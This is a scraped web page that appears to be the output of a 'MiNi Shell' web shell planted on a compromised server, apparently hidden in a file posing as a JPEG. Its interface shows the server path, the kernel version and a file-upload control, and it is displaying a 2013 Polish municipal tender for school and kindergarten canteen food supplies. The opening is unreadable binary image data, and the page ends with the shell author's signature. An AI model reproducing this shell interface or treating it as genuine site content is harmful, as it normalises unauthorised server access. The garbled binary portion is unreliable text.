JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20130909/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20130909/181333-N-2013.html

<p class="kh_header"><b>Strzelce Krajeńskie: Sprzedaż i dostawa produktów żywnościowych do stołówki szkolnej w Publicznej szkole Podstawowej w Strzelcach Krajeńskich oraz do stołówki w Przedszkolu Samorządowym Nr 2 w Strzelcach Krajeńskich 
w roku szkolnym 2013/2014</b><br>
<b>Numer ogłoszenia: 181333 - 2013; data zamieszczenia: 09.09.2013</b><br>
OGŁOSZENIE O ZAMÓWIENIU - dostawy<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Gmina Strzelce Krajeńskie , Al. Wolności 48, 66-500 Strzelce Krajeńskie, woj. lubuskie, tel. 095 7631130 w. 235, faks 095 7633294.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.strzelce.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Sprzedaż i dostawa produktów żywnościowych do stołówki szkolnej w Publicznej szkole Podstawowej w Strzelcach Krajeńskich oraz do stołówki w Przedszkolu Samorządowym Nr 2 w Strzelcach Krajeńskich 
w roku szkolnym 2013/2014.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> dostawy.</p>
<p><b>II.1.4) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> 1.1. Przedmiotem zamówienia jest sprzedaż i dostawa artykułów żywnościowych do stołówki szkolnej w Publicznej Szkole Podstawowej w Strzelcach Krajeńskich oraz do stołówki w Przedszkolu Samorządowym Nr 2 w Strzelcach Krajeńskich według pakietu:
a.	I pakiet: 	różne artykuły spożywcze
2.2. Szczegółowy opis przedmiotu zamówienia zawierają załączniki Nr 2 i Nr 3 będące jednocześnie formularzami ofertowymi.
1.3. Zamawiający dopuszcza zastosowanie produktów równoważnych względem tych wskazanych z nazwy, co ma na celu dokładniejsze określenie pożądanych przez Zamawiającego parametrów jakościowych. Przy czym produkt równoważny uważa się produkt posiadający nie gorszą lub wyższą jakość niż wskazany przez Zamawiającego, który cechować będą podobne walory wizualne i organoleptyczne.
1.4. Ilości podane w załączniku Nr 2 i Nr 3 są szacunkowe i mogą ulec zmianie. Dotyczy to zmniejszenia lub zwiększenia ilości zamawianego towaru do 20%. Wykonawcy nie będą przysługiwały żadne roszczenia wobec Zamawiającego z tytułu zmniejszenia zakresu dostawy.
1.5. Wykonawca gwarantuje Zamawiającemu, że dostarczone produkty będą odpowiadały przepisom:
a.	ustawy z 25 sierpnia 2006 o bezpieczeństwie żywności i żywienia (Dz.U. 
z   2010 r. Nr 136, poz. 914 ze zm.) oraz aktów wykonawczych do niej,
b.	ustawy z dnia 21 grudnia 2000 r. o jakości handlowej artykułów rolno - spożywczych (Dz.U. z 2005 r. Nr 187, poz. 1577 ze zm.) oraz aktów wykonawczych do niej.
1.6. Zamówienia odbywać się będą sukcesywnie przez cały okres trwania umowy na podstawie składanych przez Zamawiającego zamówień ilościowo - asortymentowych zgłaszanych telefonicznie lub pisemnie, w dni robocze przez upoważnioną osobę Zamawiającego.
1.7. Godziny dostawy produktów żywnościowych będą uzgadniane bezpośrednio 
z upoważnionymi pracownikami Zamawiającego w celu zapewnienia sprawnej organizacji pracy stołówek, uzgodnienia wymagają formy pisemnej.   
1.8. Zamówienia na produkty żywnościowe Zamawiający dokonywać będzie 
z wyprzedzeniem co najmniej jednego dnia roboczego w godzinach 8.00 - 11.00.
1.9. W przypadku stwierdzenia, w formie pisemnej, przez Zamawiającego wadliwej partii dostarczanego towaru, Wykonawca zobowiązany jest do jego wymiany na towar wolny od wad, w ilościach zakwestionowanych przez Zamawiającego:
a.	w ciągu dwóch godzin, od dostawy towaru w godzinach, o których mowa 
w pkt 1.7, w przypadku gdy produkty żywnościowe będą wykorzystane do przygotowania posiłków w dniu dostawy towaru,
b.	w ciągu sześciu godzin, w przypadku gdy produkty żywnościowe będą wykorzystane do przygotowania posiłków w dniu następnym od dostawy towaru
1.10. Wykonawca zobowiązuje się do wymiany zakwestionowanego towaru na własny koszt. Zamawiający podpisuje odbiór dostarczonej żywności.
1.11. Intendentka szkoły lub przedszkola albo upoważnieni przez Zamawiającego pracownicy będą dokonywać odbioru towaru pod względem ilościowo-wartościowym oraz obowiązujących norm jakościowych, a także dokonywać sprawdzenia zgodności cen 
z formularzem asortymentowo-cenowym. Ponadto, dokonywać będą kontroli przestrzegania zasad higienicznych warunków transportu produktów. 
1.12. Termin przydatności do spożycia produktów żywnościowych od chwili dostarczenia produktu do Zamawiającego nie może być krótszy niż ? okresu, 
w którym towar zachowuje zdatność do spożycia określoną na opakowaniu produktu.
1.13. Produkty spożywcze powinny być dostarczane w oryginalnych, nienaruszonych opakowaniach zawierających oznaczenia zgodne z obowiązującymi w tym zakresie przepisami prawa żywnościowego. 
1.14. Produkty żywnościowe cechować winien charakterystyczny dla nich wygląd i zapach bez śladów obcych zapachów, smak bez obecności obcych posmaków, konsystencja charakterystyczna dla danego rodzaju produktu. Ponadto, dostarczane produkty nie mogą wskazywać oznak zanieczyszczeń fizycznych i biologicznych.
1.15. Wykonawca dostarczać będzie zamawiane produkty żywnościowe odpowiednio do Publicznej Szkoły Podstawowej w Strzelcach Krajeńskich i Przedszkola Samorządowego Nr 2 w Strzelcach Krajeńskich. 
1.16. Transport Zamawianych produktów odbywać się będzie transportem własnym Wykonawcy oraz na jego koszt z uwzględnieniem rozładunku w szkole. 
1.17. Wykonawca obowiązany jest do zapewnienia odpowiednich warunków transportu. Każdy samochód, którym będzie dostarczana żywność musi posiadać decyzję Państwowego Inspektoratu Sanitarnego stwierdzającą spełnienie warunków do higienicznego przewozu określonych produktów, w przypadku pojazdów przewożących szybko psujące się artykuły żywnościowe świadectwo ATP.
1.18. Dysponenci i kierowcy Wykonawcy winni posiadać aktualne świadectwa zdrowia.
1.19. Zamawiający zastrzega sobie prawo do zażądania stosownego dokumentu 
w momencie dostawy produktów:
a.	decyzję organu Państwowej Inspekcji Sanitarnej dotyczącej możliwości produkcji lub obrotu danego produktu spożywczego będącego przedmiotem zamówienia,
b.	dokumenty potwierdzające stosowanie systemu HACCP.
1.20. Za sprzedaż i dostawę produktów żywnościowych Wykonawcy zostanie wypłacone wynagrodzenie, płatne według cen jednostkowych określonych w ofercie Wykonawcy, za faktycznie dostarczone produkty żywnościowe.
1.21. Wykonawca będzie obowiązany do przedłożenia faktury w dniu dostawy produktów żywnościowych po dokonaniu przez upoważnionych pracowników Zamawiającego sprawdzenia jakości i zgodności towaru z zamówieniem i podpisania odbioru towaru.
1.22. Należność za fakturę regulowana będzie przelewem, w terminie 14 dni od daty otrzymania faktury przez szkołę na wskazane konto dostawcy.
1.23. Zamawiający nie przewiduje waloryzacji cen w trakcie realizacji umowy..</p>

<p><b>II.1.6) Wspólny Słownik Zamówień (CPV):</b> 15.40.00.00-2, 15.60.00.00-4, 15.80.00.00-6, 15.98.00.00-1, 03.14.25.00-3.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 2.</p>
<p><b>II.1.8) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Okres w miesiącach: 10.</p>
<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>


<p><b>III.2) ZALICZKI</b></p>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Oświadczenie o spełnieniu warunków udziału w postępowaniu z art. 22 ust. 1 Prawa zamówień publicznych.</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Oświadczenie o spełnieniu warunków udziału w postępowaniu z art. 22 ust. 1 Prawa zamówień publicznych.</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Oświadczenie o spełnieniu warunków udziału w postępowaniu z art. 22 ust. 1 Prawa zamówień publicznych.</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Oświadczenie o spełnieniu warunków udziału w postępowaniu z art. 22 ust. 1 Prawa zamówień publicznych.</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Oświadczenie o spełnieniu warunków udziału w postępowaniu z art. 22 ust. 1 Prawa zamówień publicznych.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnianiu warunków udziału w postępowaniu należy przedłożyć:</b></p>

<p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia;</li>

</ul>

<p class="bold">III.4.4)  Dokumenty dotyczące przynależności do tej samej grupy kapitałowej</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">			
<li style="margin-bottom: 12px;">lista podmiotów należących do tej samej grupy kapitałowej w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów albo informacji o tym, że nie należy do grupy kapitałowej;</li>

</ul><p><b>III.6) INNE DOKUMENTY</b></p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>Wzór umowy - podpisany przez Wykonawcę
Formularze ofertowe w zakresie wybranych przez wykonawcę zadań od 1 do 2 - wypełnione i podpisane przez wykonawcę</p>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>

<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.bip.strzelce.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Zespół Wychowawczo-Oświatowy Al. Wolności 48 
w Strzelcach Krajeńskich.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 17.09.2013 godzina 10:00, miejsce: Urząd Miejski w Strzelcach Kraj. Al. Wolności 48 66-500 Strzelce Kraj..</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>





<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>
<p class="text kh_title">ZAŁĄCZNIK I - INFORMACJE DOTYCZĄCE OFERT CZĘŚCIOWYCH</p>
<p><b>CZĘŚĆ Nr:</b> 1 <b>NAZWA:</b> Sprzedaż i dostawa produktów żywnościowych do stołówki szkolnej w Publicznej Szkole Podstawowej w Strzelcach Krajeńskich w roku szkolnym 2013/2014 - pakiet I - różne artykuły spożywcze.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Fix do spaghetti Knorr	7	kg
Fix do gulaszu Knorr	0,15	kg
Cukier kryształ	351	kg
Cukier waniliowy	0,35	kg
Galaretka Winiary/ różne smaki  	33	kg
Kwasek cytrynowy	0,40	kg
Maga 	75 	l
Majonez Winiary	54	kg
Makaron świderek Międzybrodzki, Babuni, Arrighi  	210	kg
Makaron wstążki Międzybrodzki, Babuni, Arrighi 	16	kg
Makaron krajanka Międzybrodzki, Babuni, Arrighi 	16	kg
Pomysł na spaghetti po bolońsku	9	kg
Musztarda sarepska 	31	kg
Mąka tortowa 	220	kg
Ocet spirytusowy 	8	l
Olej kujawski 	130	l
Olej słonecznikowy 	130	l
Syrop Herbapol, Paquito  różne smaki	300	l
Sos do spaghetti oryginalny Pudliszki	75	kg
Sól jodowana	130	kg
Vegeta Podravka 	30	kg.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 15.40.00.00-2, 15.60.00.00-4, 15.80.00.00-6, 15.98.00.00-1, 03.14.25.00-3.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 10.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 2 <b>NAZWA:</b> Sprzedaż i dostawa produktów żywnościowych do stołówki w Przedszkolu Samorządowym Nr 2 w Strzelcach Krajeńskich w roku szkolnym 2013/2014 - pakiet I - różne artykuły spożywcze.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Budyń różne smaki	16	kg
Bułka tarta	45	kg
Bułki na parze	1500	szt.
Cukier kryształ	500	kg
Cukier puder	10	kg 
Cukier waniliowy	0,48	kg 
Drożdże	3	kg
Dżem wysokosłodzony  	100	kg
Herbata  granulowana	9	kg
Jaja	3600	szt.
Kakao 	4	kg
Kawa zbożowa inka rozpuszczalna	30	kg
Kisiel /różne smaki/	16	kg
Konserwa rybna filet z makreli w sosie pomidorowym Odyssee, Neptun	17	kg
Krem czekoladowy 	20	kg
Kwasek cytrynowy	2,5	kg
Majonez	10	kg
Makaron kolanka Sulma, Lubella	50	kg
Makaron nitka rosołowa Sulma, Lubella 	50	kg
Makaron Spagetti Sulma, Lubella	80	kg
Mąka pszenna luksusowa; 	400	kg
Musztarda stołowa	10	kg
Olej kujawski; 1l	200	l 
Pasztet Drobiowy Podlaski	34	kg
Płatki czekoladowe  	50	kg
Płatki kukurydziane Corn Flakes	50	kg
Przyprawa do zup Magii	50	l
Smalec	25	kg
Syrop różne smaki Herbapol, Hortex	600	l
Sos Fix do spaghetti Bolognese	2,5	kg
Sól jodowana	100	kg
Woda niegazowana  	250	l
Żurek w proszku/zupa/	7	kg
Barszcz biały w proszku/zupa/	7	kg
Mąka ziemniaczana	10	kg
Zacierka Babuni	20	kg
Kasza manna	10	kg
Ciasteczka biszkoptowe	30	kg.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 15.40.00.00-2, 15.60.00.00-4, 15.80.00.00-6, 15.98.00.00-1, 03.14.25.00-3.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 10.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>

Creat By MiNi SheLL
Email: jattceo@gmail.com